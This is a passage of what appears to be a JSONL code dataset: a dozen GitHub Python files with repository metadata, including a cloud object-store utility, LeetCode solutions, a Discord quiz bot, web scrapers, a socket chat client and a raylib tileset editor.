doctest:: composer.utils.object_store.ObjectStoreHparams.__init__.key\n\n >>> import os\n >>> params = ObjectStoreHparams(key_environ=\"OBJECT_STORE_KEY\")\n >>> key = os.environ[params.key_environ]\n >>> key\n 'MY_KEY'\n\n secret_environ (str, optional): The name of an environment variable containing the API secret or password\n to use for the provider. If no secret is required, then set this field to ``None``. (default: ``None``)\n\n For security reasons, composer requires that the secret be specified via an environment variable.\n For example, if your secret is an environment variable called ``OBJECT_STORE_SECRET`` that is set to ``MY_SECRET``,\n then you should set this parameter equal to ``OBJECT_STORE_SECRET``. Composer will read the secret like this:\n\n .. testsetup:: composer.utils.object_store.ObjectStoreHparams.__init__.secret\n\n import os\n import functools\n from composer.utils import ObjectStoreHparams\n\n original_secret = os.environ.get(\"OBJECT_STORE_SECRET\")\n os.environ[\"OBJECT_STORE_SECRET\"] = \"MY_SECRET\"\n ObjectStoreHparams = functools.partial(ObjectStoreHparams, provider=\"s3\", container=\"container\")\n\n\n .. doctest:: composer.utils.object_store.ObjectStoreHparams.__init__.secret\n\n >>> import os\n >>> params = ObjectStoreHparams(secret_environ=\"OBJECT_STORE_SECRET\")\n >>> secret = os.environ[params.secret_environ]\n >>> secret\n 'MY_SECRET'\n\n region (str, optional): Cloud region to use for the cloud provider.\n Most providers do not require the region to be specified. (default: ``None``)\n host (str, optional): Override the hostname for the cloud provider. (default: ``None``)\n port (int, optional): Override the port for the cloud provider. (default: ``None``)\n extra_init_kwargs (Dict[str, Any], optional): Extra keyword arguments to pass into the constructor\n for the specified provider. (default: ``None``, which is equivalent to an empty dictionary)\n\n .. seealso:: :class:`libcloud.storage.base.StorageDriver`\n\n \"\"\"\n\n provider: str = hp.required(\"Cloud provider to use.\")\n container: str = hp.required(\"The name of the container (i.e. 
bucket) to use.\")\n key_environ: Optional[str] = hp.optional(textwrap.dedent(\"\"\"\\\n The name of an environment variable containing\n an API key or username to use to connect to the provider.\"\"\"),\n default=None)\n secret_environ: Optional[str] = hp.optional(textwrap.dedent(\"\"\"\\\n The name of an environment variable containing\n an API secret or password to use to connect to the provider.\"\"\"),\n default=None)\n region: Optional[str] = hp.optional(\"Cloud region to use\", default=None)\n host: Optional[str] = hp.optional(\"Override hostname for connections\", default=None)\n port: Optional[int] = hp.optional(\"Override port for connections\", default=None)\n extra_init_kwargs: Dict[str, Any] = hp.optional(\n \"Extra keyword arguments to pass into the constructor for the specified provider.\", default_factory=dict)\n\n def get_provider_kwargs(self) -> Dict[str, Any]:\n \"\"\"Returns the ``provider_kwargs`` argument, which is used to construct a :class:`.ObjectStore`.\n\n Returns:\n Dict[str, Any]: The ``provider_kwargs`` for use in constructing an :class:`.ObjectStore`.\n \"\"\"\n init_kwargs = {}\n for key in (\"host\", \"port\", \"region\"):\n kwarg = getattr(self, key)\n if getattr(self, key) is not None:\n init_kwargs[key] = kwarg\n init_kwargs[\"key\"] = None if self.key_environ is None else os.environ[self.key_environ]\n init_kwargs[\"secret\"] = None if self.secret_environ is None else os.environ[self.secret_environ]\n init_kwargs.update(self.extra_init_kwargs)\n return init_kwargs\n\n def initialize_object(self):\n \"\"\"Returns an instance of :class:`.ObjectStore`.\n\n Returns:\n ObjectStore: The object_store.\n \"\"\"\n\n return ObjectStore(\n provider=self.provider,\n container=self.container,\n provider_kwargs=self.get_provider_kwargs(),\n )\n\n\nclass ObjectStore:\n \"\"\"Utility for uploading to and downloading from object (blob) stores, such as Amazon S3.\n\n .. rubric:: Example\n\n Here's an example for an Amazon S3 bucket named ``MY_CONTAINER``:\n\n >>> from composer.utils import ObjectStore\n >>> object_store = ObjectStore(\n ... provider=\"s3\",\n ... container=\"MY_CONTAINER\",\n ... provider_kwargs={\n ... \"key\": \"AKIA...\",\n ... \"secret\": \"*********\",\n ... }\n ... )\n >>> object_store\n \n\n Args:\n provider (str): Cloud provider to use. Valid options are:\n\n * :mod:`~libcloud.storage.drivers.atmos`\n * :mod:`~libcloud.storage.drivers.auroraobjects`\n * :mod:`~libcloud.storage.drivers.azure_blobs`\n * :mod:`~libcloud.storage.drivers.backblaze_b2`\n * :mod:`~libcloud.storage.drivers.cloudfiles`\n * :mod:`~libcloud.storage.drivers.digitalocean_spaces`\n * :mod:`~libcloud.storage.drivers.google_storage`\n * :mod:`~libcloud.storage.drivers.ktucloud`\n * :mod:`~libcloud.storage.drivers.local`\n * :mod:`~libcloud.storage.drivers.minio`\n * :mod:`~libcloud.storage.drivers.nimbus`\n * :mod:`~libcloud.storage.drivers.ninefold`\n * :mod:`~libcloud.storage.drivers.oss`\n * :mod:`~libcloud.storage.drivers.rgw`\n * :mod:`~libcloud.storage.drivers.s3`\n\n .. seealso:: :doc:`Full list of libcloud providers `\n\n container (str): The name of the container (i.e. bucket) to use.\n provider_kwargs (Dict[str, Any], optional): Keyword arguments to pass into the constructor\n for the specified provider. 
These arguments would usually include the cloud region\n and credentials.\n\n Common keys are:\n\n * ``key`` (str): API key or username to be used (required).\n * ``secret`` (str): Secret password to be used (required).\n * ``secure`` (bool): Whether to use HTTPS or HTTP. Note: Some providers only support HTTPS, and it is on by default.\n * ``host`` (str): Override hostname used for connections.\n * ``port`` (int): Override port used for connections.\n * ``api_version`` (str): Optional API version. Only used by drivers which support multiple API versions.\n * ``region`` (str): Optional driver region. Only used by drivers which support multiple regions.\n\n .. seealso:: :class:`libcloud.storage.base.StorageDriver`\n \"\"\"\n\n def __init__(self, provider: str, container: str, provider_kwargs: Optional[Dict[str, Any]] = None) -> None:\n provider_cls = get_driver(provider)\n if provider_kwargs is None:\n provider_kwargs = {}\n self._provider = provider_cls(**provider_kwargs)\n self._container = self._provider.get_container(container)\n\n @property\n def provider_name(self):\n \"\"\"The name of the cloud provider.\"\"\"\n return self._provider.name\n\n @property\n def container_name(self):\n \"\"\"The name of the object storage container.\"\"\"\n return self._container.name\n\n def upload_object(self,\n file_path: str,\n object_name: str,\n verify_hash: bool = True,\n extra: Optional[Dict] = None,\n headers: Optional[Dict[str, str]] = None):\n \"\"\"Upload an object currently located on a disk.\n\n .. seealso:: :meth:`libcloud.storage.base.StorageDriver.upload_object`.\n\n Args:\n file_path (str): Path to the object on disk.\n object_name (str): Object name (i.e. where the object will be stored in the container.)\n verify_hash (bool, optional): Whether to verify hashes (default: ``True``)\n extra (Optional[Dict], optional): Extra attributes to pass to the underlying provider driver.\n (default: ``None``, which is equivalent to an empty dictionary)\n headers (Optional[Dict[str, str]], optional): Additional request headers, such as CORS headers.\n (defaults: ``None``, which is equivalent to an empty dictionary)\n \"\"\"\n self._provider.upload_object(file_path=file_path,\n container=self._container,\n object_name=object_name,\n extra=extra,\n verify_hash=verify_hash,\n headers=headers)\n\n def upload_object_via_stream(self,\n obj: Union[bytes, Iterator[bytes]],\n object_name: str,\n extra: Optional[Dict] = None,\n headers: Optional[Dict[str, str]] = None):\n \"\"\"Upload an object.\n\n .. seealso:: :meth:`libcloud.storage.base.StorageDriver.upload_object_via_stream`.\n\n Args:\n obj (bytes | Iterator[bytes]): The object.\n object_name (str): Object name (i.e. where the object will be stored in the container.)\n verify_hash (bool, optional): Whether to verify hashes (default: ``True``)\n extra (Optional[Dict], optional): Extra attributes to pass to the underlying provider driver.\n (default: ``None``)\n headers (Optional[Dict[str, str]], optional): Additional request headers, such as CORS headers.\n (defaults: ``None``)\n \"\"\"\n if isinstance(obj, bytes):\n obj = iter(i.to_bytes(1, sys.byteorder) for i in obj)\n self._provider.upload_object_via_stream(iterator=obj,\n container=self._container,\n object_name=object_name,\n extra=extra,\n headers=headers)\n\n def _get_object(self, object_name: str):\n \"\"\"Get object from object store. Recursively follow any symlinks. 
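(A symlink here is an ordinary stored object whose content is the name of the object it points to.) 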
If an object does not exist, automatically\n        checks if it is a symlink by appending ``.symlink``.\n\n        Args:\n            object_name (str): The name of the object.\n        \"\"\"\n        obj = None\n        try:\n            obj = self._provider.get_object(self._container.name, object_name)\n        except ObjectDoesNotExistError:\n            # Object not found, check for potential symlink\n            object_name += \".symlink\"\n            obj = self._provider.get_object(self._container.name, object_name)\n        # Recursively trace any symlinks\n        if obj.name.endswith(\".symlink\"):\n            # Download symlink object to temporary folder\n            with tempfile.TemporaryDirectory() as tmpdir:\n                tmppath = os.path.join(tmpdir, str(uuid.uuid4()))\n                self._provider.download_object(obj=obj,\n                                               destination_path=tmppath,\n                                               overwrite_existing=True,\n                                               delete_on_failure=True)\n                # Read object name in symlink and recurse\n                with open(tmppath) as f:\n                    symlinked_object_name = f.read()\n                return self._get_object(symlinked_object_name)\n        return obj\n\n    def get_object_size(self, object_name: str) -> int:\n        \"\"\"Get the size of an object, in bytes.\n\n        Args:\n            object_name (str): The name of the object.\n\n        Returns:\n            int: The object size, in bytes.\n        \"\"\"\n        return self._get_object(object_name).size\n\n    def download_object(self,\n                        object_name: str,\n                        destination_path: str,\n                        overwrite_existing: bool = False,\n                        delete_on_failure: bool = True):\n        \"\"\"Download an object to the specified destination path.\n\n        .. seealso:: :meth:`libcloud.storage.base.StorageDriver.download_object`.\n\n        Args:\n            object_name (str): The name of the object to download.\n\n            destination_path (str): Full path to a file or a directory where the incoming file will be saved.\n\n            overwrite_existing (bool, optional): Set to ``True`` to overwrite an existing file. (default: ``False``)\n            delete_on_failure (bool, optional): Set to ``True`` to delete a partially downloaded file if\n                the download was not successful (hash mismatch / file size). (default: ``True``)\n        \"\"\"\n        obj = self._get_object(object_name)\n        self._provider.download_object(obj=obj,\n                                       destination_path=destination_path,\n                                       overwrite_existing=overwrite_existing,\n                                       delete_on_failure=delete_on_failure)\n\n    def download_object_as_stream(self, object_name: str, chunk_size: Optional[int] = None):\n        \"\"\"Return an iterator which yields object data.\n\n        .. seealso:: :meth:`libcloud.storage.base.StorageDriver.download_object_as_stream`.\n\n        Args:\n            object_name (str): Object name.\n            chunk_size (Optional[int], optional): Optional chunk size (in bytes).\n\n        Returns:\n            Iterator[bytes]: The object, as a byte stream.\n        \"\"\"\n        obj = self._get_object(object_name)\n        return self._provider.download_object_as_stream(obj, chunk_size=chunk_size)\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/utils/object_store.py","file_name":"object_store.py","file_ext":"py","file_size_in_byte":16797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70949569127","text":"class Solution:\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        tempDict = dict()\n        for i, element in enumerate(nums):\n            if target - element in tempDict:\n                return [tempDict[target - element], i]\n            tempDict[element] = i","repo_name":"DF-Kyun/LeetCode_practice","sub_path":"Table/1.
Two Sum/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39966407274","text":"\"\"\"\nMath problem generator for practice and competition.\nInspired by Art of Problem Solving's FTW, which was\ndeprecated when Adobe Flash was phased out after 2020.\n\"\"\"\n\nimport discord\nfrom discord.ext import commands\n\nimport os\n\nimport random\nimport time\nimport asyncio\nimport json\n\nimport problem_gen as pg\n\nRECORDS_PATH = 'C:/Users/jettw/Documents/Sophia Tutoring/speed_bot/user_records.json'\nANS_TOLERANCE = 0.0001\nDEFAULT_TIMER = 45\nDEFAULT_POINT_GOAL = 4\n# PROBLEMS = [f for _, f in problem_gen.__all__]\n\n# %%\n# question_generators = [*problem_type.problems() for problem_type in questions]\n\n\nTOKEN = os.getenv('DISCORD_TOKEN')\nPREFIX = \"&\"\n\nclient = commands.Bot(command_prefix = PREFIX)\n\n@client.event\nasync def on_ready():\n print('Bot ready!')\n\n__in_problem = False\n\n@client.command(name='ping')\nasync def ping(ctx):\n await ctx.send('pong!')\n\n@client.command(name='cd')\nasync def cd(ctx, *args):\n f\"\"\"\n Starts a countdown round where members race to solve problems.\n Format is first to x points, each question t seconds.\n Default: t={DEFAULT_TIMER}, x={DEFAULT_POINT_GOAL}.\n To customize, call {PREFIX}cd with both arguments specified.\n \"\"\"\n if len(args) == 2 and problem_gen.helpers.check_pos_int(args):\n t, x = args\n elif len(args) == 0:\n t, x = 45, 4\n else:\n await ctx.send(f'Improper arguments to {PREFIX}')\n\n\n\n\n@client.command(name='p')\nasync def problem(ctx):\n \"\"\"\n Serves a randomized problem.\n \"\"\"\n global __in_problem\n if __in_problem:\n await ctx.send('There\\'s already an active question!')\n return\n print('Generating problem...')\n\n question, answer = random.choice(question_generators)()\n await ctx.send(question)\n __in_problem = True\n start_time = time.time_ns()\n\n def check(m):\n try:\n return round(float(m.content), 3) == round(answer,3) and m.channel == ctx.channel\n except ValueError:\n return\n \n try:\n await client.wait_for('message', timeout=DEFAULT_TIMER, check=check)\n except asyncio.TimeoutError:\n await ctx.send(f'Time out! The answer is {round(answer,3)}.')\n time_spent = DEFAULT_TIMER\n else:\n await ctx.send(f'Correct! 
You spent {round((time.time_ns() - start_time)/1e9, 3)} seconds.')\n        time_spent = (time.time_ns() - start_time)/1e9\n    author_id = f'{ctx.author.name}#{ctx.author.discriminator}'\n    update(author_id,time_spent)\n    __in_problem = False\n\n\n@client.command(name='stats')\nasync def stats(ctx):\n    author_id = f'{ctx.author.name}#{ctx.author.discriminator}'\n    with open(RECORDS_PATH, 'r', encoding='utf-8') as f:\n        try:\n            record = json.load(f)[author_id]\n        except:\n            record = None\n    await ctx.send(f'Stats for {author_id}:'\n                   f'{record}')\n    #TODO properly format the stats string\n\ndef update(user,time_spent):\n    with open(RECORDS_PATH, 'r', encoding='utf-8') as f:\n        all_records = json.load(f)\n    if user not in all_records:\n        last_10 = [-1000] * 9\n        last_10.append(time_spent)\n        all_records[user] = {'problems attempted': 1, 'avg time': time_spent, \n                             'last 10 times': last_10}\n        with open(RECORDS_PATH,'w', encoding='utf-8') as f:\n            json.dump(all_records, f, indent=2, ensure_ascii=False)\n        return\n    record = all_records[user]\n    record['avg time'] = (record['avg time']*record['problems attempted'] + time_spent)/(record['problems attempted'] + 1)\n    record['problems attempted'] += 1\n    q = record['last 10 times']\n    q.pop(0)\n    q.append(time_spent)\n    record['last 10 times'] = q\n    with open(RECORDS_PATH,'w', encoding='utf-8') as f:\n        json.dump(all_records, f, indent=2, ensure_ascii=False)\n# %%\nclient.run(TOKEN)\n","repo_name":"quadraticmuffin/discord-ftw","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26325239736","text":"import SPP_io\nimport SPP_exceptions\nimport SPP_init\nimport SPP_aux\nimport SPP_encounter\nimport SPP_assert\n\n# 4,2,10,10,200\n\ndef initnodes(algorithm):\n    \"\"\" Initializes the nodes given an algorithm.\"\"\"\n    return algorithm.execute(nodes,maxnodeval)\n\n\nclass Node:\n    \"\"\"Class node defines an agent.\"\"\"\n    def __init__(self):\n        self.value = SPP_aux.selectRandomInt(maxnodeval)\n    \n    def setValue(self, val):\n        self.value = val\n    \nclass Experiment:\n    def __init__(self,var_init,var_encounter,var_assert):\n        for algo in SPP_init.algorithms:\n            if (algo.__str__() == var_init):\n                self._init = algo\n        for algo in SPP_encounter.algorithms:\n            if (algo.__str__() == var_encounter):\n                self._encounter = algo \n        for algo in SPP_assert.algorithms:\n            if (algo.__str__() == var_assert):\n                self._assert = algo\n    def __str__(self):\n        return \"[init: %s, encounter: %s, assert: %s]\" % (var_init, var_encounter, var_assert)\n# MAIN #\n\n\ndef experiment():\n    \n    global nodes \n    global maxnodes\n    global var_init\n    global var_encounter\n    global var_assert\n    global runsPerExp\n    global roundsPerRun\n    global maxnodeval\n    \n    maxnodes= eval(maxnodes)\n    runsPerExp = eval(runsPerExp)\n    roundsPerRun = eval(roundsPerRun)\n    maxnodeval = eval(maxnodeval)\n    \n    \n    nodes = []\n    for i in range(maxnodes):\n        nodes += [Node()]\n    \n    experiment = Experiment(var_init, var_encounter, var_assert) \n    print(\"STARTING %s experiment, for %d runs\\n\" % (experiment, runsPerExp))\n    \n    for run in range(runsPerExp):\n        maxInNetwork = initnodes(experiment._init)\n        \n        for round in range(roundsPerRun):\n            node1 = SPP_aux.selectRandomNode(nodes)\n            node2 = SPP_aux.selectRandomNode(nodes)\n            experiment._encounter.execute(node1,node2)\n        \n        if (experiment._assert.execute(maxInNetwork,nodes)):\n            print(\"\\n--Experiment %s, run %d, OK\" % (experiment, run))\n        else:\n            print(\"\\n--Experiment %s, run %d, FAILED\" %
(experiment, run))\n            SPP_io.dumpstates(nodes)\n    \n    print(\"DONE.\")\n    \ndef main():\n    global nodes    \n    global maxnodes\n    global var_init\n    global var_encounter\n    global var_assert\n    global runsPerExp\n    global roundsPerRun\n    global maxnodeval\n    \n    test = SPP_io.readvalues(\"specifications.txt\")\n    for t in test:\n        print(\"______________________TEST______________________\")\n        maxnodes, var_init, var_encounter, var_assert, runsPerExp, roundsPerRun, maxnodeval = t\n        print(\"NODES:\",maxnodes)\n        experiment()\n    \n    \nif __name__ == \"__main__\":\n    main() ","repo_name":"lidiamcfreitas/SimulatorPopulationProtocols","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23241195195","text":"# The numbers 0, 1, ..., n-1 are arranged in a circle. Starting from the number 0, the m-th number is deleted from the circle each round (after a deletion, counting resumes from the next number). Find the last number remaining in the circle.\n#\n# For example, the five numbers 0, 1, 2, 3, 4 form a circle. Starting from the number 0 and deleting every 3rd number, the first four numbers deleted are 2, 0, 4 and 1, so the last remaining number is 3.\n#\n\n\"\"\"\n# Brute-force simulation with recursion; exceeds the time limit\nclass Solution:\n    def dfs(self, nums, m, start):\n        if len(nums) == 1:\n            return nums[0]\n        delIdx = (start + m - 1) % len(nums)\n        nums.pop(delIdx)\n        return self.dfs(nums, m, delIdx)\n\n    def lastRemaining(self, n: int, m: int) -> int:\n        nums = list(range(n))\n        return self.dfs(nums, m, 0)\n\"\"\"\n\n# Dynamic programming: the well-known Josephus circle\n# If the solution of the (n-1, m) problem is known to be f(n-1), then the solution of the (n, m) problem is\n# f(n)=(f(n-1)+m)%n\n\nclass Solution:\n    def lastRemaining(self, n: int, m: int) -> int:\n        x = 0\n        for i in range(2, n + 1):\n            x = (x + m) % i\n        return x\n","repo_name":"vandeppce/algorithm","sub_path":"15.math/Offer62*LastRemaining.py","file_name":"Offer62*LastRemaining.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44561024158","text":"import math\nimport matplotlib.pyplot as plt\n\ng=9.8\n\ndef simple_euler(omega0,theta0,l,T,dt):\n    t=0\n    omega,theta = omega0,theta0\n    motion=[[]for i in range(3)]\n    motion[0].append(omega)\n    motion[1].append(theta)\n    motion[2].append(t)\n    while t<=T:\n        m = omega\n        omega = m-(g/l)*theta*dt\n        theta = theta+m*dt\n        t = t+dt\n        motion[0].append(omega)\n        motion[1].append(theta)\n        motion[2].append(t)\n    return motion\n\nd=simple_euler(0,0.2,1,10,0.04)\nplt.plot(d[2],d[1],linestyle='-',linewidth=1.0,label='dt=0.04')\nd=simple_euler(0,0.2,1,10,0.05)\nplt.plot(d[2],d[1],linestyle='-',linewidth=1.0,label='dt=0.05')\n\n\nplt.xlim(0,10)\nplt.grid(True,color='k')\nplt.title('Fig.1 simple_euler')\nplt.xlabel('Time(s)')\nplt.ylabel(r'$\\theta$(radius)')\nplt.legend()\nplt.show()\n\n\n","repo_name":"zhaoyoyo/computationalphysics_N2013301020083","sub_path":"finalexam/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16422566995","text":"import scrapy\nimport sys\nfrom tutorial.items import Book\n\n\nclass doubanSpider(scrapy.Spider):\n    \n    name = 'testEntry'\n\n    start_urls = [\n        'https://book.douban.com/subject/25862578/'\n    ]\n\n    def parse_entry(self, response):\n\n        # book = Book()\n\n        ############################## info from entry ############################\n        ###########################################################################\n        \n        # title = response.css('div#info span.pl::text').extract()\n        # for i in title:\n        #     i.replace(':','').replace(':','')\n        # content = response.css('div#info::text').extract()\n        # for i in content:\n        #     i.strip().replace('\n', '').replace\n        \n        
###########################################################################\n ###########################################################################\n \n\n # book['name'] = response.xpath('//*[@id=\"wrapper\"]/h1/span')\n # book['author'] = response.xpath('//*[@id=\"info\"]/a[1]/text()').extract()[0].strip().replace('\\n','').replace(' ','')\n # book['public'] = response.xpath('//*[@id=\"info\"]/text()[5]').extract()[0].replace(' ','')\n # book['origin_name'] = response.xpath('//*[@id=\"info\"]/text()[7]').extract()[0].replace(' ','')\n # book['public_year'] = response.xpath('//*[@id=\"info\"]/text()[10]').extract()[0].replace(' ','')\n # book['pages'] = response.xpath('//*[@id=\"info\"]/text()[12]').extract()[0].replace(' ','')\n # book['price'] = response.xpath('//*[@id=\"info\"]/text()[14]').extract()[0].replace(' ','')\n # book['book_type'] = response.xpath('//*[@id=\"info\"]/text()[16]').extract()[0].replace(' ','')\n # book['isbn'] = response.xpath('//*[@id=\"info\"]/text()[20]').extract()[0].replace(' ','')\n # book['comment_link'] = response.xpath('//*[@id=\"content\"]/div/div[1]/div[3]/div[11]/h2/span[2]/a/@href').extract[0]\n\n # yield book\n\n link = response.css('div.mod-hd h2 span.pl a::attr(href)').extract()[0]\n comment_link = response.urljoin(link)\n yield scrapy.Request(comment_link, callback=self.parse_comment)\n\n","repo_name":"SunnyZWQ/crawl-book","sub_path":"tutorial/spiders/testEntry.py","file_name":"testEntry.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28991947067","text":"import socket\nimport threading\n\nHOST = \"127.0.0.1\"\nPORT = 4780\n\ndef communicating_to_server(c):\n username = input(\"Username: \")\n is_not_empty = bool(username)\n while(not is_not_empty):\n username = input(\"Username: \")\n is_not_empty = bool(username)\n\n c.sendall(bytes(username, 'utf-8'))\n threading.Thread(target=listening_for_message, args=(c,)).start()\n send_message(c)\n\ndef listening_for_message(c):\n\n while True:\n response = c.recv(2048).decode(\"utf-8\")\n print(response)\n\ndef send_message(c):\n\n while True:\n msg = input(\"Message: \")\n is_not_empty = bool(msg)\n if is_not_empty:\n c.sendall(bytes(msg, \"utf-8\"))\n else:\n pass\n\n\n\ndef main():\n c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n c.connect((HOST, PORT))\n print(\"Successful connection to server\")\n communicating_to_server(c)\n except:\n print(\"Unable to establish a connection\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"MGCreator/case-study-2-s2","sub_path":"Programming/Chat/CLI/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27440158700","text":"import json\nimport math\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pipeline.scrapers.utils import *\n\n\nclass CNNSearchScraper:\n url = 'https://search.prod.di.api.cnn.io/content?q={keyword}&size=10&from=0&page={page}&sort=relevance&types=article'\n\n def search(self, keyword, top_n=10):\n response = requests.get(self.url.format(keyword=keyword, page=1))\n\n if response.status_code == 200:\n page_content = response.content.decode(\"utf-8\")\n\n json_data = json.loads(page_content)\n\n last_page_number = math.floor(json_data['meta']['total'] / 10)\n\n titles = []\n texts = []\n\n while len(titles) < top_n:\n for page_number in range(1, last_page_number + 1):\n 
response = requests.get(self.url.format(keyword=keyword, page=page_number))\n\n if response.status_code == 200:\n page_content = response.content.decode(\"utf-8\")\n\n json_data = json.loads(page_content)\n\n for result in json_data['result']:\n title = result['headline']\n href = result['url']\n print(\"Title:\", title)\n print(\"Href:\", href)\n print(\"-\" * 50)\n response = requests.get(href)\n soup = BeautifulSoup(response.content, \"html.parser\")\n paragraphs = soup.find_all('div', class_='zn-body__paragraph')\n paragraphs = [p.get_text(\" \", strip=True).replace(\"\\n\", \" \") for p in paragraphs]\n if len(paragraphs) == 0:\n paragraphs = soup.find_all(\"p\")\n paragraphs = [p.get_text(\" \", strip=True).replace(\"\\n\", \" \") for p in paragraphs]\n if len(paragraphs) == 0:\n continue\n paragraphs = \"\\n\".join(paragraphs)\n titles.append(title)\n texts.append(paragraphs)\n if len(titles) == top_n:\n break\n if len(titles) == top_n:\n break\n if len(titles) == top_n:\n break\n if len(titles) == top_n:\n break\n\n return pd.DataFrame({'title': titles, 'text': texts})\n\n\nif __name__ == '__main__':\n scraper = CNNSearchScraper()\n print(scraper.search('coronavirus', top_n=10))\n","repo_name":"Weikang01/fake_news_detector","sub_path":"pipeline/scrapers/cnn_search_scraper.py","file_name":"cnn_search_scraper.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28186639145","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n carry = 0\n result = ListNode(0)\n pointer = result\n while (l1 or l2 or carry):\n first_num = l1.val if l1 else 0\n second_num = l2.val if l2 else 0\n total_sum = first_num + second_num + carry\n carry = total_sum // 10\n num = total_sum % 10\n\n pointer.next = ListNode(num)\n pointer = pointer.next\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n\n return result.next\n \n'''\nInput: l1 = [2,3,7,8], l2 = [5,6,4,9]\n\nOutput: [7,9,1,8,1]\n '''\n","repo_name":"BsalBhandari/leetCode-Python","sub_path":"addTwoNum.py","file_name":"addTwoNum.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27481896803","text":"import json\nimport pyray as rl\nimport argparse\nimport os.path\nfrom typing import Literal\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"image\", help=\"image containing the tileset\")\nargs = parser.parse_args()\njson_file = os.path.splitext(args.image)[0] + \".def.json\"\n\nincluded_tiles: dict[tuple[int, int], Literal[\"collide\", \"none\"]] = {}\ntile_size = 16\n\nif os.path.exists(json_file):\n with open(json_file, \"r\") as f:\n d = json.load(f)\n if d:\n print(f\">>> Loading previous definition from {json_file}\")\n # Use width from first rectangle as tile_size\n # NOTE: assumes all tiles are the same height/width\n tile_size = d[0][\"rect\"][2]\n included_tiles = {\n (tile[\"rect\"][0] // tile_size, tile[\"rect\"][1] // tile_size): tile[\n \"collision\"\n ]\n for tile in d\n }\n\nrl.init_window(800, 600, \"Tileset generator\")\n\ntex = rl.load_texture(args.image)\n\ntile_size_ptr = rl.ffi.new(\"int *\")\ntile_size_ptr[0] = tile_size\ntile_size_edit = False\n\nSCALE = 2\nORIGIN = (10, 50)\n\ncamera = 
rl.Camera2D(ORIGIN, (0, 0), 0, SCALE)\n\nrl.set_target_fps(60)\n\n# the subset of tile coordinates, mapped to their collision type\nwhile not rl.window_should_close():\n if rl.is_key_released(rl.KEY_F):\n rl.toggle_fullscreen()\n\n rl.begin_drawing()\n rl.clear_background(rl.BLACK)\n if rl.gui_value_box(\n rl.Rectangle(60, 10, 100, 30),\n \"tile size\",\n tile_size_ptr,\n 1,\n 255,\n tile_size_edit,\n ):\n tile_size_edit = not tile_size_edit\n tile_size = tile_size_ptr[0]\n\n rl.begin_mode_2d(camera)\n rl.draw_texture(tex, 0, 0, rl.WHITE)\n\n for x in range(tex.width // tile_size + 1):\n rl.draw_line(x * tile_size, 0, x * tile_size, tex.height, rl.PURPLE)\n\n for y in range(tex.height // tile_size + 1):\n rl.draw_line(0, y * tile_size, tex.width, y * tile_size, rl.PURPLE)\n\n for tile in included_tiles:\n color = rl.RED if included_tiles[tile] == \"collide\" else rl.WHITE\n rl.draw_rectangle_lines(\n tile[0] * tile_size, tile[1] * tile_size, tile_size, tile_size, color\n )\n\n mouse_pos_world = rl.get_screen_to_world_2d(rl.get_mouse_position(), camera)\n mouse_tile = (\n int(mouse_pos_world.x // tile_size),\n int(mouse_pos_world.y // tile_size),\n )\n\n if rl.is_mouse_button_released(rl.MOUSE_BUTTON_LEFT):\n if mouse_tile in included_tiles:\n del included_tiles[mouse_tile]\n else:\n included_tiles[mouse_tile] = \"none\"\n\n if rl.is_mouse_button_released(rl.MOUSE_BUTTON_RIGHT):\n if included_tiles.get(mouse_tile, None) == \"collide\":\n included_tiles[mouse_tile] = \"none\"\n else:\n included_tiles[mouse_tile] = \"collide\"\n\n rl.end_mode_2d()\n rl.end_drawing()\n\nwith open(json_file, \"w\") as f:\n json.dump(\n [\n {\n \"rect\": [\n tile[0] * tile_size,\n tile[1] * tile_size,\n tile_size,\n tile_size,\n ],\n \"collision\": included_tiles[tile],\n }\n for tile in included_tiles\n ],\n f,\n )\n\nprint(f\">>> Wrote tileset definition output to {json_file}\")\n\nrl.close_window()\n","repo_name":"clsater/legend-of-zink","sub_path":"demoassets/gen_tiledef.py","file_name":"gen_tiledef.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20941740087","text":"import sys\nfrom time import sleep\n\ndef loading(str):\n\timport sys\n\tfrom time import sleep\n\n\tfor char in str:\n\t\tsleep(0.0)\n\t\tsys.stdout.write(char)\n\t\tsys.stdout.flush()\n\ndef typewrite(str):\n\timport sys\n\tfrom time import sleep\n\n\tfor char in 